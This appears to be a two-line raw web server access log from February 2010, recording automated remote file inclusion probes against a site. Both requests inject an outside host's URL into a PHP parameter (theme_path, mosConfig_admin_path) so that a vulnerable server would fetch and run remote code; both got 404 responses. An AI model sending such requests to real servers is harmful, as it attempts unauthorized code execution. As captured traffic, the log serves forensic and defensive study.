83.103.72.130 - - [25/Feb/2010:08:15:00 -0800] "GET /logs/access_100218.log%20%20/become_editor.php?theme_path=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [25/Feb/2010:08:15:07 -0800] "GET /logs/access_100217.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
